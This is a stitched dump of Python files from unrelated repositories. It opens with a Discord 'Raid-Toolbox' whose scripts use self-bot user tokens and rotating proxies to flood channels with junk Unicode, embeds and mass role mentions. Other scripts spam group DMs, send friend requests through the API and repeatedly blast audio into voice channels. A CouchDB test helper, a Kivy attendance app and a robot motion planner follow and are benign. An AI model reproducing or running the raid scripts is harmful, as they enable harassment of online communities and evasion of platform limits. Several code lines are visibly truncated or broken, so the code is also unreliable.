{ "source": "00-00-00-11/Raid-Toolbox", "score": 2 }
#### File: Raid-Toolbox/spammer/ ```python import discord import random import sys import aiohttp token = sys.argv[1] tokenno = sys.argv[2] textchan = sys.argv[3] allchan = sys.argv[4] SERVER = sys.argv[5] useproxies = sys.argv[6] if useproxies == 'True': proxy_list = open("proxies.txt").read().splitlines() proxy = random.choice(proxy_list) con = aiohttp.ProxyConnector(proxy="http://"+proxy) client = discord.Client(connector=con) else: client = discord.Client() @client.event async def on_ready(): server = client.get_guild(int(SERVER)) if allchan == 'true': while not client.is_closed(): for channel in server.text_channels: myperms = channel.permissions_for(server.get_member( if not myperms.send_messages: continue asc = '' for x in range(1999): num = random.randrange(13000) asc = asc + chr(num) try: await channel.send(asc) except Exception: pass else: txtchan = client.get_channel(int(textchan)) while not client.is_closed(): asc = '' for x in range(1999): num = random.randrange(13000) asc = asc + chr(num) try: await txtchan.send(asc) except Exception: pass try:, bot=False) except Exception as c: print (c) ``` #### File: Raid-Toolbox/spammer/ ```python import discord import sys import random import aiohttp token = sys.argv[1] title = sys.argv[2] author = sys.argv[3] iconurl = sys.argv[4] thumburl = sys.argv[5] footer = sys.argv[6] textchan = sys.argv[7] useproxies = sys.argv[8] if useproxies == 'True': proxy_list = open("proxies.txt").read().splitlines() proxy = random.choice(proxy_list) con = aiohttp.ProxyConnector(proxy="http://"+proxy) client = discord.Client(connector=con) else: client = discord.Client() # set embed embed=discord.Embed(title=title) embed.set_author(name=author, icon_url=iconurl) embed.set_thumbnail(url=thumburl) embed.set_footer(text=footer) @client.event async def on_ready(): try: txtchan = client.get_channel(int(textchan)) while True: await txtchan.send(embed=embed) except Exception: pass try:, bot=False) except Exception as c: print (c) ``` #### File: Raid-Toolbox/spammer/ ```python import sys import requests import random token = sys.argv[1] userid = sys.argv[2] useproxies = sys.argv[3] if useproxies == 'True': proxy_list = open("proxies.txt").read().splitlines() def proxyfriend(): try: proxy = random.choice(proxy_list) requests.put(apilink, headers=headers, proxies={"http": proxy, "https": proxy}) except Exception: proxyfriend() apilink = ''+ str(userid) headers={ 'Authorization': token, 'Content-Type': 'application/json' } if useproxies == 'True': proxyfriend() else: requests.put(apilink, headers=headers) ``` #### File: Raid-Toolbox/spammer/ ```python import discord import sys import random import aiohttp import logging token = sys.argv[1] group = sys.argv[2] tokenno = sys.argv[3] msgtxt = sys.argv[4] useproxies = sys.argv[5] logging.basicConfig(filename='RTB.log', filemode='w', format='Token {}'.format(str(tokenno))+' - %(levelname)s - %(message)s',level=logging.CRITICAL) if useproxies == 'True': proxy_list = open("proxies.txt").read().splitlines() proxy = random.choice(proxy_list) con = aiohttp.ProxyConnector(proxy="http://"+proxy) client = discord.Client(connector=con) else: client = discord.Client() @client.event async def on_ready(): groupdm = client.get_channel(int(group)) while not client.is_closed(): try: await groupdm.send(msgtxt) except Exception: pass try:, bot=False) except Exception as c: logging.critical('Token {} Unable to login: {}'.format(str(tokenno),str(c))) print (c) ``` #### File: Raid-Toolbox/spammer/ ```python import discord import sys import random import aiohttp useproxies = sys.argv[4] if useproxies == 'True': proxy_list = open("proxies.txt").read().splitlines() proxy = random.choice(proxy_list) con = aiohttp.ProxyConnector(proxy="http://"+proxy) client = discord.Client(connector=con) else: client = discord.Client() token = sys.argv[1] SERVER = sys.argv[2] tokenno = sys.argv[3] @client.event async def on_ready(): server = client.get_guild(int(SERVER)) mention = '' try: for role in server.roles: if role.mentionable: mention += role.mention + ' ' else: continue while not client.is_closed(): for channel in server.text_channels: myperms = channel.permissions_for(server.get_member( if not myperms.send_messages: continue for m in [mention[i:i+1999] for i in range(0, len(mention), 1999)]: try: await channel.send(m) except Exception: pass except Exception as e: print (e) pass try:, bot=False) except Exception as c: print (c) ``` #### File: Raid-Toolbox/spammer/ ```python import discord import asyncio import random import sys import aiohttp useproxies = sys.argv[2] if useproxies == 'True': proxy_list = open("proxies.txt").read().splitlines() proxy = random.choice(proxy_list) con = aiohttp.ProxyConnector(proxy="http://"+proxy) client = discord.Client(connector=con) else: client = discord.Client() token = sys.argv[1] @client.event async def on_ready(): while not client.is_closed(): randoms = ['1','2','3'] presence = (random.choice(randoms)) if presence == '1': await client.change_presence( await asyncio.sleep(3) elif presence == '2': await client.change_presence(status=discord.Status.idle) await asyncio.sleep(3) elif presence == '3': await client.change_presence(status=discord.Status.do_not_disturb) await asyncio.sleep(3) try:, bot=False) except Exception as c: print (c) ``` #### File: Raid-Toolbox/spammer/ ```python import discord import asyncio import sys import random import aiohttp token = sys.argv[1] tokenno = sys.argv[2] voice_id = sys.argv[3] useproxies = sys.argv[4] # proxies for voice chats smh if useproxies == 'True': proxy_list = open("proxies.txt").read().splitlines() proxy = random.choice(proxy_list) con = aiohttp.ProxyConnector(proxy="http://"+proxy) client = discord.Client(connector=con) else: client = discord.Client() @client.event async def on_ready(): await asyncio.sleep(1) voice_channel = client.get_channel(int(voice_id)) while not client.is_closed(): vc = await voice_channel.connect()'spammer/file.wav')) vc.source = discord.PCMVolumeTransformer(vc.source) vc.source.volume = 10.0 while vc.is_playing(): await asyncio.sleep(3) await vc.disconnect(force=True) try:, bot=False) except Exception as c: print(c) ```
{ "source": "00000111/aiocouchdb", "score": 2 }
#### File: aiocouchdb/tests/ ```python import asyncio import base64 import contextlib import datetime import functools import os import random import unittest import unittest.mock as mock import uuid as _uuid from collections import deque, defaultdict import aiocouchdb.client import aiocouchdb.errors from aiocouchdb.client import urljoin, extract_credentials from yarl import URL TARGET = os.environ.get('AIOCOUCHDB_TARGET', 'mock') def run_in_loop(f): @functools.wraps(f) def wrapper(testcase, *args, **kwargs): coro = asyncio.coroutine(f) future = asyncio.wait_for(coro(testcase, *args, **kwargs), timeout=testcase.timeout) return testcase.loop.run_until_complete(future) return wrapper class MetaAioTestCase(type): def __new__(cls, name, bases, attrs): for key, obj in attrs.items(): if key.startswith('test_'): attrs[key] = run_in_loop(obj) return super().__new__(cls, name, bases, attrs) class TestCase(unittest.TestCase, metaclass=MetaAioTestCase): _test_target = TARGET timeout = 10 url = URL('http://localhost:5984') def setUp(self): self.loop = asyncio.new_event_loop() asyncio.set_event_loop(self.loop) wraps = None if self._test_target != 'mock': wraps = self._request_tracer(aiocouchdb.client.request) self._patch = mock.patch('aiocouchdb.client.request', wraps=wraps) self.request = self._patch.start() self._set_response(self.prepare_response()) self._req_per_task = defaultdict(list) self.loop.run_until_complete(self.setup_env()) def tearDown(self): self.loop.run_until_complete(self.teardown_env()) self._patch.stop() self.loop.close() @asyncio.coroutine def setup_env(self): sup = super() if hasattr(sup, 'setup_env'): yield from sup.setup_env() @asyncio.coroutine def teardown_env(self): sup = super() if hasattr(sup, 'teardown_env'): yield from sup.teardown_env() def future(self, obj): fut = asyncio.Future(loop=self.loop) fut.set_result(obj) return fut def _request_tracer(self, f): @functools.wraps(f) def wrapper(*args, **kwargs): current_task = asyncio.Task.current_task(loop=self.loop) self._req_per_task[current_task].append((args, kwargs)) return f(*args, **kwargs) return wrapper def prepare_response(self, *, cookies=None, data=b'', err=None, headers=None, status=200): def make_side_effect(queue): def side_effect(*args, **kwargs): fut = asyncio.Future(loop=self.loop) if queue: resp.content.at_eof.return_value = False fut.set_result(queue.popleft()) elif err: fut.set_exception(err) else: resp.content.at_eof.return_value = True fut.set_result(b'') return fut return side_effect headers = headers or {} headers.setdefault('CONTENT-TYPE', 'application/json') cookies = cookies or {} if isinstance(data, list): chunks_queue = deque(data) lines_queue = deque((b''.join(data)).splitlines(keepends=True)) else: chunks_queue = deque([data]) lines_queue = deque(data.splitlines(keepends=True)) resp = aiocouchdb.client.HttpResponse('', '') resp._post_init(self.loop) resp.status = status resp.headers = headers resp.cookies = cookies resp.content = unittest.mock.Mock() resp.content._buffer = bytearray() resp.content.at_eof.return_value = False = make_side_effect(chunks_queue) resp.content.readany.side_effect = make_side_effect(chunks_queue) resp.content.readline.side_effect = make_side_effect(lines_queue) resp.close = mock.Mock(side_effect=resp.close) return resp @contextlib.contextmanager def response(self, *, cookies=None, data=b'', err=None, headers=None, status=200): resp = self.prepare_response(cookies=cookies, data=data, err=err, headers=headers, status=status) self._set_response(resp) yield resp resp.close() self._set_response(self.prepare_response()) def _set_response(self, resp): if self._test_target == 'mock': self.request.return_value = self.future(resp) def assert_request_called_with(self, method, *path, **kwargs): self.assertTrue(self.request.called and self.request.call_count >= 1) current_task = asyncio.Task.current_task(loop=self.loop) if current_task in self._req_per_task: call_args, call_kwargs = self._req_per_task[current_task][-1] else: call_args, call_kwargs = self.request.call_args self.assertEqual((method, urljoin(self.url, *path)), call_args) kwargs.setdefault('data', None) kwargs.setdefault('headers', {}) kwargs.setdefault('params', {}) for key, value in kwargs.items(): self.assertIn(key, call_kwargs) if value is not Ellipsis: self.assertEqual(value, call_kwargs[key]) class ServerTestCase(TestCase): server_class = None url = os.environ.get('AIOCOUCHDB_URL', 'http://localhost:5984') @asyncio.coroutine def setup_env(self): self.url, creds = extract_credentials(self.url) self.server = self.server_class(self.url, loop=self.loop) if creds is not None: self.cookie = yield from*creds) else: self.cookie = None sup = super() if hasattr(sup, 'setup_env'): yield from sup.setup_env() @asyncio.coroutine def teardown_env(self): sup = super() if hasattr(sup, 'teardown_env'): yield from sup.teardown_env() class DatabaseTestCase(ServerTestCase): database_class = None def new_dbname(self): return dbname('.')[-1]) @asyncio.coroutine def setup_env(self): yield from super().setup_env() dbname = self.new_dbname() self.url_db = urljoin(self.url, dbname) self.db = self.database_class( self.url_db, dbname=dbname, loop=self.loop) yield from self.setup_database(self.db) @asyncio.coroutine def setup_database(self, db): with self.response(data=b'{"ok": true}'): yield from db.create() @asyncio.coroutine def teardown_env(self): yield from self.teardown_database(self.db) yield from super().teardown_env() @asyncio.coroutine def teardown_database(self, db): with self.response(data=b'{"ok": true}'): try: yield from db.delete() except aiocouchdb.errors.ResourceNotFound: pass class DocumentTestCase(DatabaseTestCase): document_class = None @asyncio.coroutine def setup_env(self): yield from super().setup_env() docid = uuid() self.url_doc = urljoin(self.db.resource.url, docid) self.doc = self.document_class( self.url_doc, docid=docid, loop=self.loop) yield from self.setup_document(self.doc) @asyncio.coroutine def setup_document(self, doc): with self.response(data=b'{"rev": "1-ABC"}'): resp = yield from doc.update({}) self.rev = resp['rev'] class DesignDocumentTestCase(DatabaseTestCase): designdoc_class = None @asyncio.coroutine def setup_env(self): yield from super().setup_env() docid = '_design/' + uuid() self.url_ddoc = urljoin(self.db.resource.url, *docid.split('/')) self.ddoc = self.designdoc_class( self.url_ddoc, docid=docid, loop=self.loop) yield from self.setup_document(self.ddoc) @asyncio.coroutine def setup_document(self, ddoc): with self.response(data=b'{"rev": "1-ABC"}'): resp = yield from ddoc.doc.update({ 'views': { 'viewname': { 'map': 'function(doc){ emit(doc._id, null) }' } } }) self.rev = resp['rev'] class AttachmentTestCase(DocumentTestCase): attachment_class = None @asyncio.coroutine def setup_env(self): yield from super().setup_env() self.attbin = self.attachment_class( urljoin(self.doc.resource.url, 'binary'), name='binary') self.atttxt = self.attachment_class( urljoin(self.doc.resource.url, 'text'), name='text') self.url_att = self.attbin.resource.url @asyncio.coroutine def setup_document(self, doc): with self.response(data=b'{"rev": "1-ABC"}'): resp = yield from doc.update({ '_attachments': { 'binary': { 'data': base64.b64encode(b'Time to relax!').decode(), 'content_type': 'application/octet-stream' }, 'text': { 'data': base64.b64encode(b'Time to relax!').decode(), 'content_type': 'text/plain' } } }) self.rev = resp['rev'] def modify_server(section, option, value): assert section != 'admins', 'use `with_fixed_admin_party` decorator' @asyncio.coroutine def apply_config_changes(server, cookie): oldval = yield from server.config.update(section, option, value, auth=cookie) return oldval @asyncio.coroutine def revert_config_changes(server, cookie, oldval): if not oldval: try: yield from server.config.delete(section, option, auth=cookie) except aiocouchdb.errors.ResourceNotFound: pass else: if not (yield from server.config.exists(section, option)): return oldval = yield from server.config.update(section, option, oldval, auth=cookie) assert oldval == value, ('{} != {}'.format(oldval, value)) def decorator(f): @functools.wraps(f) def wrapper(testcase, **kwargs): server, cookie = testcase.server, testcase.cookie oldval = yield from apply_config_changes(server, cookie) try: yield from f(testcase, **kwargs) finally: yield from revert_config_changes(server, cookie, oldval) return wrapper return decorator def with_fixed_admin_party(username, password): @asyncio.coroutine def apply_config_changes(server, cookie): oldval = yield from server.config.update('admins', username, password, auth=cookie) cookie = yield from, password) return oldval, cookie @asyncio.coroutine def revert_config_changes(server, cookie, oldval): if not oldval: try: yield from server.config.delete('admins', username, auth=cookie) except aiocouchdb.errors.ResourceNotFound: pass else: yield from server.config.update('admins', username, oldval, auth=cookie) def decorator(f): @functools.wraps(f) def wrapper(testcase, **kwargs): server, cookie = testcase.server, testcase.cookie oldval, cookie = yield from apply_config_changes(server, cookie) if cookie is not None: kwargs[username] = cookie try: yield from f(testcase, **kwargs) finally: yield from revert_config_changes(server, cookie, oldval) return wrapper return decorator def using_database(dbarg='db'): @asyncio.coroutine def create_database(server, cookie): db = server[dbname()] yield from db.create(auth=cookie) return db @asyncio.coroutine def drop_database(db, cookie): try: yield from db.delete(auth=cookie) except aiocouchdb.errors.ResourceNotFound: pass def decorator(f): @functools.wraps(f) def wrapper(testcase, **kwargs): server, cookie = testcase.server, testcase.cookie with testcase.response(data=b'{"ok": true}'): db = yield from create_database(server, cookie) assert dbarg not in kwargs, \ 'conflict: both {} and {} are referenced as {}'.format( db, kwargs[dbarg], dbarg ) kwargs[dbarg] = db try: yield from f(testcase, **kwargs) finally: with testcase.response(data=b'{"ok": true}'): yield from drop_database(db, cookie) return wrapper return decorator @asyncio.coroutine def populate_database(db, docs_count): def generate_docs(count): for _ in range(count): dt = datetime.datetime.fromtimestamp( random.randint(1234567890, 2345678901) ) dta = [dt.year, dt.month,, dt.hour, dt.minute, dt.second] doc = { '_id': uuid(), 'created_at': dta, 'num': random.randint(0, 10), 'type': random.choice(['a', 'b', 'c']) } yield doc if not (yield from db.exists()): yield from db.create() docs = list(generate_docs(docs_count)) updates = yield from db.bulk_docs(docs) mapping = {doc['_id']: doc for doc in docs} if not updates: return {} for update in updates: mapping[update['id']]['_rev'] = update['rev'] return mapping def uuid(): return _uuid.uuid4().hex def dbname(idx=None, prefix='test/aiocouchdb'): if idx: return '/'.join((prefix, idx, uuid())) else: return '/'.join((prefix, uuid())) def run_for(*targets): def decorator(f): @functools.wraps(f) @unittest.skipIf(TARGET not in targets, 'runs only for targets: %s' % ', '.join(targets)) def wrapper(*args, **kwargs): return f(*args, **kwargs) return wrapper return decorator def skip_for(*targets): def decorator(f): @functools.wraps(f) @unittest.skipIf(TARGET in targets, 'skips for targets: %s' % ', '.join(targets)) def wrapper(*args, **kwargs): return f(*args, **kwargs) return wrapper return decorator ```
{ "source": "0000Blaze/Smart-Attendance", "score": 2 }
#### File: Smart-Attendance/teacherApp/ ```python from server import client_teacher from numpy import spacing from import MDApp from kivymd.uix.boxlayout import MDBoxLayout from kivymd.uix.button import MDRaisedButton from kivymd.uix.label import MDLabel from kivy.uix.image import Image from kivymd.uix.textfield import MDTextField from kivymd.uix.datatables import MDDataTable from kivy.metrics import dp from kivy.uix.screenmanager import ScreenManager, Screen class LoginWindow(Screen): pass class AttendanceWindow(Screen): pass cardColor = [0.796875, 0.8984375, 0.99609375, 1] textColor = [0, 0, 0, 1] backgroundColor = [0.59765625, 0.8046875, 0.99609375, 1] sm = ScreenManager() sm.add_widget(LoginWindow(name="login")) sm.add_widget(AttendanceWindow(name="attendance")) class MainApp(MDApp): teacherId = "" classId = "" className = "" classList = [] subjectId = "" subjectname = "" subjectList = [] attendanceId = "" attendanceList = {} attendanceToBeDone = [] attendanceListMini = [] data_tables = None stop_btn = None present_btn = None def __init__(self, **kwargs): self.title = "Smart Attendance" super().__init__(**kwargs) def build(self): loginBg = MDBoxLayout() loginBg.md_bg_color = backgroundColor imageLayout = MDBoxLayout(size_hint=(0.15, 0.15), pos_hint={'center_x': .5, 'center_y': .9}) imageObj = Image(source="./assets/icon.png") imageLayout.add_widget(imageObj) smallCard = MDBoxLayout() smallCard.md_bg_color = cardColor smallCard.size_hint = (0.5, 0.65) smallCard.radius = [40, 40, 40, 40] smallCard.orientation = "vertical" smallCard.pos_hint = {'center_x': .5, 'center_y': .5} teacherIDBox = MDBoxLayout() teacherIDBox.pos_hint = {'center_x': .5, 'center_y': .5} teacherIDBox.orientation = 'vertical' teacherIDBox.adaptive_height = True teacherIDBox.size_hint = (0.5, 1.0) self.teacherIDInp = MDTextField(hint_text="Teacher Id:") self.teacherIDInp.color_mode = "custom" self.teacherIDInp.line_color_normal = textColor self.teacherIDInp.line_color_focus = textColor self.teacherIDInp.hint_text_color = textColor self.teacherIDInp.pos_hint = {'center_x': .5, 'center_y': .2} self.classIDInp = MDTextField(hint_text="Class Id:") self.classIDInp.hint_text = "Class Id:" self.classIDInp.color_mode = "custom" self.classIDInp.line_color_normal = textColor self.classIDInp.line_color_focus = textColor self.classIDInp.hint_text_color = textColor self.classIDInp.pos_hint = {'center_x': .5, 'center_y': .2} teacherIDLabel = MDLabel(text="Teacher Id:") teacherIDLabel.size_hint = (1, 0.2) classIDLabel = MDLabel(text="Class Id:") classIDLabel.size_hint = (1, 0.2) teacherIDBox.add_widget(teacherIDLabel) teacherIDBox.add_widget(self.teacherIDInp) teacherIDBox.add_widget(classIDLabel) teacherIDBox.add_widget(self.classIDInp) connectButton = MDRaisedButton(text="Connect") connectButton.pos_hint = {'center_x': .5, 'center_y': .5} connectButton.bind(on_press=self.connectCallback) subjectNameLayout = MDBoxLayout(orientation="vertical") subjectNameLayout.pos_hint = {'center_x': .5, 'center_y': .5} subjectNameLayout.size_hint = (0.65, 0.5) subjectNameLayout.adaptive_height = True self.teacherName = MDLabel(pos_hint={'center_x': .5, 'center_y': .5}) self.teacherName.text = "" self.subjectName = MDLabel(pos_hint={'center_x': .5, 'center_y': .5}) self.subjectName.text = "No Connection" subjectNameLayout.add_widget(self.teacherName) subjectNameLayout.add_widget(self.subjectName) startButton = MDRaisedButton(text="Start") startButton.pos_hint = {'center_x': .5, 'center_y': .5} startButton.bind(on_release=self.startCallback) smallCard.add_widget(teacherIDBox) smallCard.add_widget(connectButton) smallCard.add_widget(subjectNameLayout) smallCard.add_widget(startButton) smallCard.add_widget(MDLabel(size_hint=(1, 0.2))) loginScreen = sm.get_screen("login") loginScreen.add_widget(loginBg) loginScreen.add_widget(imageLayout) loginScreen.add_widget(smallCard) ########################################################################### attendanceBg = MDBoxLayout() attendanceBg.md_bg_color = backgroundColor attendanceBox = MDBoxLayout(orientation="vertical") attendanceBox.pos_hint = {"center_x": .5, "center_y": .9} attendanceBox.size_hint = (0.9, 0.2) # attendanceBox.adaptive_height = True # attendanceBox = MDBoxLayout(spacing="40dp") # attendanceBox.md_bg_color = [1, 0, 0, 1] attendanceInnerBox1 = MDBoxLayout(orientation="horizontal") attendanceInnerBox1.size_hint = (1, 0.5) self.attendanceTextLabel = MDLabel( text="Attendance will time out in 10 minutes") backButton = MDRaisedButton(text="Back") backButton.bind(on_press=self.backCallback) attendanceInnerBox2 = MDBoxLayout(orientation="horizontal") attendanceInnerBox2.size_hint = (1, 0.5) self.attendanceCodeLabel = MDLabel(text="Attendance Code :") refreshButton = MDRaisedButton(text="Refresh") refreshButton.bind(on_press=self.refreshCallback) attendanceInnerBox1.add_widget(self.attendanceTextLabel) attendanceInnerBox1.add_widget(backButton) attendanceInnerBox2.add_widget(self.attendanceCodeLabel) attendanceInnerBox2.add_widget(refreshButton) attendanceBox.add_widget(attendanceInnerBox1) attendanceBox.add_widget(attendanceInnerBox2) # stopAttendanceButton = MDRaisedButton(text="Stop Attendance") # stopAttendanceButton.bind(on_press=self.stopAttendanceCallback) attendanceScreen = sm.get_screen("attendance") attendanceScreen.add_widget(attendanceBg) attendanceScreen.add_widget(attendanceBox) # attendanceScreen.add_widget(stopAttendanceButton) return sm def getSubject(self): try: subjectListFromServer = client_teacher.updateClassAndSubjects( self.teacherId) # # get subject list of each class teached by teacher # for i in subjectListFromServer["subject"]: # self.subjectList.append(i) # print(subjectList) if "error" not in subjectListFromServer: # print(subjectListFromServer["teacher_name"]) self.subjectId = subjectListFromServer["subject"][0][0] self.subjectname = subjectListFromServer["subject"][0][1] self.teacherName.text = str( "Welcome, ") + str(subjectListFromServer["teacher_name"]) # print(self.subjectId) except Exception as e: print("Subject retrival error", e) pass def startAttendanceSheet(self): try: AttendanceListFromServer = client_teacher.startAttendance( self.teacherId, self.classId, self.subjectId) print(self.teacherId, self.classId, self.subjectId) if "error" in AttendanceListFromServer: print(AttendanceListFromServer["error"]) self.attendanceTextLabel.text = AttendanceListFromServer["error"] else: # save attendance code self.attendanceId = AttendanceListFromServer["acode"] for list in AttendanceListFromServer["student_list"]: #print(list[0], list[1]) presence = "Absent" presenceList = [list[1], presence] self.attendanceList[list[0]] = presenceList print(AttendanceListFromServer["timeout"]) self.attendanceTextLabel.text = AttendanceListFromServer["timeout"] except Exception as e: print("error :", e) def updateAttendanceSheet(self): try: AttendanceListFromServer = client_teacher.getAttendance( self.teacherId, self.classId) if "error" in AttendanceListFromServer: print(AttendanceListFromServer["error"]) else: # update presence in list keys = AttendanceListFromServer["student_list"] # print(keys) for key in keys: self.attendanceList[key][1] = "Present" self.widgetRemover() # removes old instance of datatable,stop and present button attendanceScreen = sm.get_screen("attendance") # adds data table , stop and present button self.load_table(attendanceScreen) except Exception as e: print(e) def finalAttendanceSheet(self, *args): try: AttendanceListFromServer = client_teacher.stopAttendance( self.teacherId, self.classId) if "error" in AttendanceListFromServer: print(AttendanceListFromServer["error"]) self.attendanceTextLabel.text = AttendanceListFromServer["error"] else: print(AttendanceListFromServer["success"]) self.attendanceTextLabel.text = AttendanceListFromServer["success"] except Exception as e: print(e) def manualPresent(self, *args): try: for text in self.attendanceToBeDone: print("Done presence", text) client_teacher.markAttendance( self.teacherId, self.classId, text) except: print("some error occured during manual attendance") # empty selected check for presence while len(self.attendanceToBeDone) > 0: self.attendanceToBeDone.pop() # print("After",self.attendanceToBeDone) self.updateAttendanceSheet() def startCallback(self, *args): self.startAttendanceSheet() self.attendanceCodeLabel.text = "Attendance Code: " + \ str(self.attendanceId) sm.current = "attendance" attendanceScreen = sm.get_screen("attendance") self.load_table(attendanceScreen) def connectCallback(self, *args): self.classIDInp.text = self.classIDInp.text.upper() self.teacherId = self.teacherIDInp.text self.classId = self.classIDInp.text self.getSubject() # print("searching subject for", self.teacherID, self.classID) self.subjectName.text = str(self.subjectname) def stopAttendanceCallback(self, *args): self.finalAttendanceSheet() self.attendanceCodeLabel.text = "Attendance Code: " pass def backCallback(self, *args): sm.current = "login" def refreshCallback(self, *args): self.updateAttendanceSheet() self.widgetRemover() aScreen = sm.get_screen("attendance") self.load_table(aScreen) def stopCallback(self, *args): self.finalAttendanceSheet() pass def presentCallback(self, *args): self.manualPresent() attendanceScreen = sm.get_screen("attendance") self.widgetRemover() self.load_table(attendanceScreen) pass def load_table(self, aScreen): # list to make attendance list a list for initial insert in data table AttendListMini = [] for key in self.attendanceList: AttendListMini.append(key) AttendListMini.append(self.attendanceList[key][0]) AttendListMini.append(self.attendanceList[key][1]) self.data_tables = MDDataTable( pos_hint={'center_y': 0.5, 'center_x': 0.5}, size_hint=(0.7, 0.6), rows_num=48, check=True, # use_pagination=True, column_data=[ ("Roll Number", dp(40)), ("Student", dp(30)), ("Presence", dp(30)), ], row_data=[ (AttendListMini[i*3], AttendListMini[(i*3)+1], AttendListMini[(i*3)+2]) for i in range(int(len(AttendListMini)/3)) # (f"{i + 1}", "2.23", "3.65") # for i in range(50) ], ) self.data_tables.bind(on_check_press=self.check_press) self.stop_btn = MDRaisedButton( text="Stop", pos_hint={'center_y': 0.1, 'center_x': 0.6} ) self.stop_btn.bind(on_press=self.stopCallback) self.present_btn = MDRaisedButton( text="Mark Present", pos_hint={'center_y': 0.1, 'center_x': 0.3} ) self.present_btn.bind(on_press=self.presentCallback) aScreen.add_widget(self.data_tables) aScreen.add_widget(self.stop_btn) aScreen.add_widget(self.present_btn) # return layout def check_press(self, instance_table, current_row): print(current_row) self.attendanceToBeDone.append(current_row[0]) def widgetRemover(self): attendanceScreen = sm.get_screen("attendance") attendanceScreen.remove_widget(self.data_tables) attendanceScreen.remove_widget(self.stop_btn) attendanceScreen.remove_widget(self.present_btn) # attendanceScreen.clear_widgets() # attendanceScreen.add_widget(MDLabel(text="hi ravi")) if __name__ == "__main__": MainApp().run() ```
{ "source": "0000duck/MPlib", "score": 3 }
#### File: MPlib/mplib/ ```python from typing import Sequence, Tuple, Union import os import numpy as np from transforms3d.quaternions import quat2mat import toppra import toppra as ta import toppra.constraint as constraint import toppra.algorithm as algo from .pymp import * class Planner: """Motion planner.""" # TODO(jigu): default joint vel and acc limits # TODO(jigu): how does user link names and joint names are exactly used? def __init__( self, urdf: str, user_link_names: Sequence[str], user_joint_names: Sequence[str], move_group: str, joint_vel_limits: Union[Sequence[float], np.ndarray], joint_acc_limits: Union[Sequence[float], np.ndarray], srdf: str = "" ): r"""Motion planner for robots. Args: urdf: Unified Robot Description Format file. user_link_names: names of links, the order user_joint_names: names of the joints to plan move_group: target link to move, usually the end-effector. joint_vel_limits: maximum joint velocities for time parameterization, which should have the same length as joint_acc_limits: maximum joint accelerations for time parameterization, which should have the same length as srdf: Semantic Robot Description Format file. References: """ self.urdf = urdf if srdf == "" and os.path.exists(urdf.replace(".urdf", ".srdf")): srdf = urdf.replace(".urdf", ".srdf") print("No SRDF file provided. Try to load %s." % srdf) self.srdf = srdf self.user_link_names = user_link_names self.user_joint_names = user_joint_names self.joint_name_2_idx = {} for i, joint in enumerate(self.user_joint_names): self.joint_name_2_idx[joint] = i self.link_name_2_idx = {} for i, link in enumerate(self.user_link_names): self.link_name_2_idx[link] = i self.robot = articulation.ArticulatedModel( urdf, srdf, [0, 0, -9.81], self.user_joint_names, self.user_link_names, verbose=False, convex=True, ) self.pinocchio_model = self.robot.get_pinocchio_model() self.planning_world = planning_world.PlanningWorld( [self.robot], ["robot"], [], [] ) if srdf == "": self.generate_collision_pair() self.robot.update_SRDF(self.srdf) assert(move_group in self.user_link_names) self.move_group = move_group self.robot.set_move_group(self.move_group) self.move_group_joint_indices = ( self.robot.get_move_group_joint_indices() ) self.joint_types = self.pinocchio_model.get_joint_types() self.joint_limits = np.concatenate( self.pinocchio_model.get_joint_limits() ) self.planner = ompl.OMPLPlanner(world=self.planning_world) self.joint_vel_limits = joint_vel_limits self.joint_acc_limits = joint_acc_limits self.move_group_link_id = self.link_name_2_idx[self.move_group] assert len(self.joint_vel_limits) == len( self.move_group_joint_indices ), len(self.move_group_joint_indices) assert len(self.joint_acc_limits) == len(self.move_group_joint_indices) def generate_collision_pair(self, sample_time = 1000000, echo_freq = 100000): print("Since no SRDF file is provided. We will first detect link pairs that will always collide. This may take several minutes.") n_link = len(self.user_link_names) cnt = np.zeros((n_link, n_link), dtype=np.int32) for i in range(sample_time): qpos = self.pinocchio_model.get_random_configuration() self.robot.set_qpos(qpos, True) collisions = self.planning_world.collide_full() for collision in collisions: u = self.link_name_2_idx[collision.link_name1] v = self.link_name_2_idx[collision.link_name2] cnt[u][v] += 1 if i % echo_freq == 0: print("Finish %.1f%%!" % (i * 100 / sample_time)) import xml.etree.ElementTree as ET from xml.dom import minidom root = ET.Element('robot') robot_name = self.urdf.split('/')[-1].split('.')[0] root.set('name', robot_name) self.srdf = self.urdf.replace(".urdf", ".srdf") for i in range(n_link): for j in range(n_link): if cnt[i][j] == sample_time: link1 = self.user_link_names[i] link2 = self.user_link_names[j] print("Ignore collision pair: (%s, %s), reason: always collide" % (link1, link2)) collision = ET.SubElement(root, 'disable_collisions') collision.set('link1', link1) collision.set('link2', link2) collision.set('reason', 'Default') srdffile = open(self.srdf, "w") srdffile.write(minidom.parseString(ET.tostring(root)).toprettyxml(indent=" ")) srdffile.close() print("Saving the SRDF file to %s" % self.srdf) def distance_6D(self, p1, q1, p2, q2): return np.linalg.norm(p1 - p2) + min( np.linalg.norm(q1 - q2), np.linalg.norm(q1 + q2) ) def check_joint_limit(self, q): n = len(q) flag = True for i in range(n): if self.joint_types[i].startswith("JointModelR"): if np.abs(q[i] - self.joint_limits[i][0]) < 1e-3: continue q[i] -= ( 2 * np.pi * np.floor((q[i] - self.joint_limits[i][0]) / (2 * np.pi)) ) if q[i] > self.joint_limits[i][1] + 1e-3: flag = False else: if ( q[i] < self.joint_limits[i][0] - 1e-3 or q[i] > self.joint_limits[i][1] + 1e-3 ): flag = False return flag def IK(self, goal_pose, start_qpos, mask = [], n_init_qpos=20, threshold=1e-3): index = self.link_name_2_idx[self.move_group] min_dis = 1e9 idx = self.move_group_joint_indices qpos0 = np.copy(start_qpos) results = [] self.robot.set_qpos(start_qpos, True) for i in range(n_init_qpos): ik_results = self.pinocchio_model.compute_IK_CLIK( index, goal_pose, start_qpos, mask ) flag = self.check_joint_limit(ik_results[0]) # will clip qpos # check collision self.planning_world.set_qpos_all(ik_results[0][idx]) if (len(self.planning_world.collide_full()) != 0): flag = False if flag: self.pinocchio_model.compute_forward_kinematics(ik_results[0]) new_pose = self.pinocchio_model.get_link_pose(index) tmp_dis = self.distance_6D( goal_pose[:3], goal_pose[3:], new_pose[:3], new_pose[3:] ) if tmp_dis < min_dis: min_dis = tmp_dis if tmp_dis < threshold: result = ik_results[0] unique = True for j in range(len(results)): if np.linalg.norm(results[j][idx] - result[idx]) < 0.1: unique = False if unique: results.append(result) start_qpos = self.pinocchio_model.get_random_configuration() mask_len = len(mask) if mask_len > 0: for j in range(mask_len): if mask[j]: start_qpos[j] = qpos0[j] if len(results) != 0: status = "Success" elif min_dis != 1e9: status = ( "IK Failed! Distance %lf is greater than threshold %lf." % (min_dis, threshold) ) else: status = "IK Failed! Cannot find valid solution." 